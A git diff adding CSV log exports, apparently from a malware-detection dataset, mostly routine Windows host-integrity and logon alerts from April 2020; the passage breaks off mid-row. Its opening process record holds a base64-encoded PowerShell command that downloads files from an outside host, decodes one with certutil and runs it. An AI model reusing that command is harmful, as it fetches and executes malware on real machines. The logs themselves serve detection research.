SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA="",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481"",""parentProcessGuid"":""{df9fc3d3-d0e3-5ec7-0000-00107c1d0700}"",""parentProcessId"":""5700"",""parentImage"":""C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe"",""parentCommandLine"":""C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding""}}}" diff --git a/data/MW_19_NIDS.csv b/data/MW_19_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_19_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_1_HIDS_1.csv b/data/MW_1_HIDS_1.csv new file mode 100644 index 0000000..40aeade --- /dev/null +++ b/data/MW_1_HIDS_1.csv @@ -0,0 +1,338 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 12:30:31.902",3,"Service startup type was changed", +"Apr 4, 2020 @ 12:29:21.055",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '73acbb9a6b37e06d3d01797d22daea0c' +New md5sum is : '0dc86d77d124bb6b155bb549028af3b4' +Old sha1sum was: '2c751e78055f27d77f2cd5500fea136989db0758' +New sha1sum is : 'c722c6e745e275c7f0d1d2539e58c03fd22195fa' +" +"Apr 4, 2020 @ 12:29:21.039",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '15a5122056556e452eb8a80f7bafc0ed' +New md5sum is : 'abdaf1142070594f55c16de20de0ecca' +Old sha1sum was: '6119a631079846a34ad70550b6245a827e56e943' +New sha1sum is : '7a54bab4683e307c96eebc64d5244ce6417b8b7c' +" +"Apr 4, 2020 @ 12:29:17.539",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:29:17.509",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:29:13.868",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 12:29:10.539",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : 'b4226e31c64aa3415f26064e055e68c3' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '46945000f0220428ef57f13d54c8a2ceaa305687' +" +"Apr 4, 2020 @ 12:29:10.508",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'b315409e33ad85f56aa7f98994a648f4' +New md5sum is : 'cf2fddc0383906c94bd746fc28f1c4d5' +Old sha1sum was: '264e0f23983367bd5365043fddede5f7f471ce68' +New sha1sum is : '2eaa7a7dac68d00dc822e249c351150d025f34a1' +" +"Apr 4, 2020 @ 12:29:10.492",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '2562a8b20783e33b22897206ebf502cf' +New md5sum is : 'd5462f300e2f617d362b4f3bb6d4ba99' +Old sha1sum was: 'ada72f790b4a65aa119002c7c3643cc502d4c463' +New sha1sum is : '00a49d93f252e8a492de34d56cc2b2ba1662a192' +" +"Apr 4, 2020 @ 12:29:09.680",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '3626264b2bd01507a49b19e1aa64e7ea' +New md5sum is : '25d0183d5c5629974b3c23282c14f09e' +Old sha1sum was: '3e044f3ca69dee62e15813eba0c19ae98d413fa2' +New sha1sum is : 'aeeefb5382709b3ffe72b88e68a1fc2869bdb3b8' +" +"Apr 4, 2020 @ 12:29:08.368",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'd0b31528150e0bcaaf1ca31e909625ae' +New md5sum is : 'f831bbb4b4e3aa71d36063136978431b' +Old sha1sum was: '4ac9c45fb8b59e455e5cffb095693fd8ba73e2e9' +New sha1sum is : 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +" +"Apr 4, 2020 @ 12:29:08.149",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'e6d41cd8615634f93c4cf78ea8862dc8' +New md5sum is : '07296bfe9f0bfcb49184a0b811972f99' +Old sha1sum was: '50d3eb76f8f9eeee924a8a583af5025746f5f498' +New sha1sum is : '79ebd2b7c3546c7dddfff35ea466cc526594382b' +" +"Apr 4, 2020 @ 12:29:07.492",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:29:07.477",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:29:07.368",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '5da37fb8bb1a89d035cf6d0905e889d3' +New md5sum is : 'e0538a3443440110bf3825bfec5e6075' +Old sha1sum was: 'b6d193698efd60175765020280fb2fc3e8647550' +New sha1sum is : 'e5f255d3aa180bfe02848c7ccd3f55a84325f55b' +" +"Apr 4, 2020 @ 12:29:07.180",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '52c5b7e643b603f7da07fb87724fd62b' +New md5sum is : '6021abc3342bd637a1f3e58eadc384a5' +Old sha1sum was: '00c98b4e3acc758733e97e05b2546ad10364a5e7' +New sha1sum is : '74fbcbb06a5825a47e0950f3cb6ac1c03e265d00' +" +"Apr 4, 2020 @ 12:29:06.664",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:29:06.646",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:29:05.977",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd0b31528150e0bcaaf1ca31e909625ae' +New md5sum is : 'f831bbb4b4e3aa71d36063136978431b' +Old sha1sum was: '4ac9c45fb8b59e455e5cffb095693fd8ba73e2e9' +New sha1sum is : 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +" +"Apr 4, 2020 @ 12:29:04.133",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '7d19d8f0e41d39b56e1a42b1146f6570' +New md5sum is : '1ff9d2bcd158e032084b85e368bbbc93' +Old sha1sum was: 'b0ae33cc6b87e9feb6cdb0b2cdbfbc0abd7c12e3' +New sha1sum is : '654be9998073db5fb7eb1b02ce093e6875191b0a' +" +"Apr 4, 2020 @ 12:28:58.586",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 4, 2020 @ 12:28:56.772",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '52fb5d0b7da48f73ac3fbe434dfe1f0a' +New md5sum is : '59c3dc20f6ca7bf5d3e4497b0fbb523a' +Old sha1sum was: 'de2f6be9dbec4b2bb8df4ca2490e582bcd21add6' +New sha1sum is : '21fd5eb9f4366c737be868e4d053798ae111f329' +" +"Apr 4, 2020 @ 12:28:56.351",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'b37d88849329a851787efa3b6513665f' +New md5sum is : 'd4e36f3a15fd44265b8465f9557ea88d' +Old sha1sum was: 'c9c09efe3bf177be5acc55723783810cf39fbd8a' +New sha1sum is : '452ac62117c54d53212a78a079263bb0875839f1' +" +"Apr 4, 2020 @ 12:28:56.273",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +" +"Apr 4, 2020 @ 12:28:56.257",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '91ff903577114e23bb94c88a6e53fb30' +New md5sum is : 'b53bf2f3f61682c350be645945192116' +Old sha1sum was: 'e2bf40dac64a1e7b7e118a7c1d10223c8a45082b' +New sha1sum is : 'b5f04a7f7762c384b95b4d56b16e28e5cc863241' +" +"Apr 4, 2020 @ 12:28:51.820",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 4, 2020 @ 12:28:49.867",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:49.851",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:49.319",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:49.304",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:47.416",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:47.403",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:44.632",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '8d9ddf4cd30cb1f7e5ac293f30aecda3' +New md5sum is : 'a34f50b409ff791b8ca73db3b1ca0733' +Old sha1sum was: 'dff2cd5fdb172279d12d40cd687230eba840bace' +New sha1sum is : 'ef5248efe24d4437def466d2cef3295c26f57ead' +" +"Apr 4, 2020 @ 12:28:43.364",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +" +"Apr 4, 2020 @ 12:28:43.044",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '3ee67f24b1bf3a60668b6b9b7ceb57db' +New md5sum is : '9899f0d851a544118a1df10180c84633' +Old sha1sum was: '2c7378d3b213a72ef12d4a556bce6bdcc0354b44' +New sha1sum is : '495d124fb9a33489fca070669c53f629787f537f' +" +"Apr 4, 2020 @ 12:28:42.012",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '5b2ea53198ac98428f3237ad2688a712' +New md5sum is : '59b12546060e1abacf07181ecdab1088' +Old sha1sum was: '4b6855e7d75db3d7382571a292c5590fa9c45d1b' +New sha1sum is : 'd4b00ea9b57b4fa8d52f007174e8a4fa9c806927' +" +"Apr 4, 2020 @ 12:28:41.895",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:41.872",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a0e1\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 12:28:41.856",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:35.294",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '4f5d0a4201320eacd047d993b51c860c' +New md5sum is : 'ae2d280bcb1d70c8d8c9440f99e7346f' +Old sha1sum was: 'ebc1c34aea8b5ff39cdf566769ab687e8678327b' +New sha1sum is : '5e5d8fc3198d01bfeb0b40c7b5b2377aa397ca0b' +" +"Apr 4, 2020 @ 12:28:34.031",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '8d9ddf4cd30cb1f7e5ac293f30aecda3' +New md5sum is : 'a34f50b409ff791b8ca73db3b1ca0733' +Old sha1sum was: 'dff2cd5fdb172279d12d40cd687230eba840bace' +New sha1sum is : 'ef5248efe24d4437def466d2cef3295c26f57ead' +" +"Apr 4, 2020 @ 12:28:31.465",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'ba932c9bc52c8941758880d70e805a03' +New md5sum is : 'e539e5588ade4fc950140b672a9b4a8e' +Old sha1sum was: '4c54a5c3e5e976d942eb6e92aa7a0dbf29d3da53' +New sha1sum is : '5aff67900ed86033e13fa95ee5d8cddc4bf716f6' +" +"Apr 4, 2020 @ 12:28:30.747",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '8d9ddf4cd30cb1f7e5ac293f30aecda3' +New md5sum is : 'a34f50b409ff791b8ca73db3b1ca0733' +Old sha1sum was: 'dff2cd5fdb172279d12d40cd687230eba840bace' +New sha1sum is : 'ef5248efe24d4437def466d2cef3295c26f57ead' +" +"Apr 4, 2020 @ 12:28:29.903",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 4, 2020 @ 12:28:29.419",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:28:22.273",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'c49bd58f7203d1a7b354bbe1c57a8688' +New md5sum is : 'e8b3d7e25b8fb5dd2b186e056006ffd4' +Old sha1sum was: 'cac279660d22f6ed20f11905612284759bf29722' +New sha1sum is : 'b321fb7cfcf165737c087395491ecb8c386e9010' +" +"Apr 4, 2020 @ 12:28:14.746",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DsmSvc\State' checksum changed. +Old md5sum was: '760a4bada178d4343aea42eba0843c6c' +New md5sum is : '63455c20cde548e288f8dba9a00dd33b' +Old sha1sum was: '52d66aacb149b05f27bc68ebecd67c04e65c70a2' +New sha1sum is : '28420a387fa959459932089a9494e96fcc914797' +" +"Apr 4, 2020 @ 12:28:14.090",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '6bf6c77f49d9c3e29dd6dd026f712498' +New md5sum is : '5d59f40e382b0bd5741c31b20dc9877d' +Old sha1sum was: 'cee2e4f252e785a4923147e41cbe4da500294572' +New sha1sum is : '35a4b6689f4c1e64b1097375ed53f30de17c00da' +" +"Apr 4, 2020 @ 12:28:12.809",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:12.778",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:12.683",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:12.668",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:12.419",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:12.390",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:11.746",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:11.715",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:11.512",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:11.481",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:11.356",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd0b31528150e0bcaaf1ca31e909625ae' +New md5sum is : 'f831bbb4b4e3aa71d36063136978431b' +Old sha1sum was: '4ac9c45fb8b59e455e5cffb095693fd8ba73e2e9' +New sha1sum is : 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +" +"Apr 4, 2020 @ 12:28:10.043",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:10.027",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:09.887",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:09.871",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:09.792",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:09.777",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:07.684",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:07.668",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 12:28:07.637",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 12:28:07.606",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 12:28:07.590",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 12:28:07.559",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 12:28:07.543",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:06.777",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:06.763",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:28:06.355",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'fbc1bc27f7b282bbde5c96220cd80867' +New md5sum is : '0fbd85d390c648f73d243e459fc4c439' +Old sha1sum was: '541f116913d701780efcca644fb357aefa18d06d' +New sha1sum is : '4cfcff84f3698f6a858f7a5799d31fc7d81426df' +" +"Apr 4, 2020 @ 12:28:06.339",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '5f41249c6834324a3bed00165f484028' +New md5sum is : 'd27ed1a432d89e8be52f17c1744a38bc' +Old sha1sum was: '55652eae98a769000c026ec4085931d715e9da75' +New sha1sum is : 'f5193efad00e671e9802d94baecb86989890a7f3' +" +"Apr 4, 2020 @ 12:28:06.293",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '7b41abc45e1ece0b0fcc347b8152d56c' +New md5sum is : '96524085ad01638d29a94ea6811680f0' +Old sha1sum was: 'efffeaf67a57d9ae08afe3825068527d6aa3bffd' +New sha1sum is : 'd60d212b81c6fa16646c5fc9724e1eb7edba2639' +" +"Apr 4, 2020 @ 12:28:03.965",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:28:03.949",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:27:57.778",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:27:08.681",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 12:26:50.547",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:26:41.445",3,"Windows User Logoff", +"Apr 4, 2020 @ 12:26:41.429",3,"Windows User Logoff", +"Apr 4, 2020 @ 12:26:41.398",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 12:26:41.383",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 12:26:35.987",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 12:26:33.187",3,"The Windows Search Service started", +"Apr 4, 2020 @ 12:26:33.013",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:26:32.961",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:26:32.727",3,"The database engine attached a database", +"Apr 4, 2020 @ 12:26:32.487",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 12:26:29.781",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:26:29.714",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 12:26:29.504",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 12:26:29.480",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 12:26:28.415",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 12:26:27.068",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 12:25:51.802",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 12:25:51.779",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 12:25:49.339",5,"Windows System error event", +"Apr 4, 2020 @ 12:25:49.292",5,"Windows System error event", +"Apr 4, 2020 @ 12:24:37.133",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:24:32.619",3,"Service startup type was changed", +"Apr 4, 2020 @ 12:24:15.207",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 12:22:50.724",3,"Service startup type was changed", +"Apr 4, 2020 @ 12:21:11.319",5,"Windows System error event", +"Apr 4, 2020 @ 12:21:06.319",3,"Windows Logon Success", +"Apr 4, 2020 @ 12:21:06.258",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 12:21:05.398",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 12:20:44.647",3,"Service startup type was changed", +"Apr 4, 2020 @ 12:20:43.179",3,"The database engine attached a database", +"Apr 4, 2020 @ 12:20:43.096",3,"The database engine has completed recovery steps", +"Apr 4, 2020 @ 12:20:43.038",3,"The database engine is replaying log file C:\Winnt\system32\wins\j50.log", +"Apr 4, 2020 @ 12:20:43.009",3,"The database engine is initiating recovery steps", +"Apr 4, 2020 @ 12:20:42.987",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 